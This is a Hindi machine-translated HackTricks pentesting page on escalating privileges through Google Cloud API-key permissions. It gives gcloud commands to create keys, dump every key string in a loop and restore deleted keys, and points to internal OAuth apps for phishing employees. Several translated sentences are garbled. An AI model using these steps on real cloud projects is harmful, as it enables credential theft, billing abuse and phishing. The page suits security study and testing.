GCP - Apikeys Privesc

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

एपीआई कुंजी

निम्नलिखित अनुमतियाँ एपीआई कुंजी बनाने और चुराने के लिए उपयोगी हैं, न कि इसे दस्तावेज़ से: एक एपीआई कुंजी एक सरल एन्क्रिप्टेड स्ट्रिंग है जो किसी अनुप्रयोग की पहचान करती है बिना किसी मुख्याधिकारी के। ये सार्वजनिक डेटा को गुमनामी से एक्सेस करने के लिए उपयोगी हैं, और आपके परियोजना के साथ API अनुरोधों को कोटा और बिलिंग के लिए जोड़ने के लिए उपयोग किए जाते हैं।

इसलिए, एक एपीआई कुंजी के साथ आप उस कंपनी को अपने एपीआई के उपयोग के लिए भुगतान करने के लिए कर सकते हैं, लेकिन आपको वृद्धि की अनुमतियों को बढ़ाने की क्षमता नहीं होगी।

एपीआई कुंजी के बारे में अधिक जानकारी के लिए देखें:

pageGCP - API Keys Enum

अन्य तरीकों से एपीआई कुंजी बनाने के लिए देखें:

pageGCP - Serviceusage Privesc

ब्रूट फोर्स एपीआई कुंजी एक्सेस

आपको शायद पता नहीं हो कि परियोजना में कौन सी एपीआई सक्षम हैं या आपके द्वारा पाई गई एपीआई कुंजी पर लागू प्रतिबंध क्या है, इसलिए यह दौड़ने के लिए दस्तावेज़ https://github.com/ozguralp/gmapsapiscanner चलाना और एपीआई कुंजी के साथ आप क्या एक्सेस कर सकते हैं उसे जांचना दूरुस्त होगा।

apikeys.keys.create

यह अनुमति एक एपीआई कुंजी बनाने की अनुमति देती है:

gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

आप एक स्क्रिप्ट पा सकते हैं जिससे एक वल्नरबल वातावरण का निर्माण, शोषण और सफाई किया जा सकता है यहाँ.

ध्यान दें कि डिफ़ॉल्ट रूप से उपयोगकर्ताओं को नए परियोजनाएँ बनाने की अनुमति होती है और उन्हें नए परियोजन पर मालिक भूमिका प्रदान की जाती है। इसलिए एक उपयोगकर्ता एक परियोजना और इस परियोजना के अंदर एक API कुंजी बना सकता है

apikeys.keys.getKeyString , apikeys.keys.list

ये अनुमतियाँ सभी एपीआई कुंजीयों को सूचीबद्ध और प्राप्त करने की अनुमति देती हैं और कुंजी प्राप्त करने की

for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

आप एक स्क्रिप्ट पा सकते हैं जिसका एक वल्न पर्यावरण का निर्माण, शोषण और सफाईकरण स्वचालित करने के लिए यहाँ है।

apikeys.keys.undelete , apikeys.keys.list

ये अनुमतियाँ आपको हटाए गए एपीआई कुंजी की सूची और पुनर्उत्पादित करने की अनुमति देती हैं। एपीआई कुंजी आउटपुट में दी जाती है जब undelete किया जाता है:

gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

अन्य कर्मचारियों को फिशिंग करने के लिए आंतरिक OAuth एप्लिकेशन बनाएं

इस कार्रवाई को कैसे करें, इसे सेवा clientauthconfig दस्तावेजों के अनुसार करना है, इसे सीखने के लिए निम्नलिखित पृष्ठ की जाँच करें:

pageGWS - Google Platforms Phishing

Last updated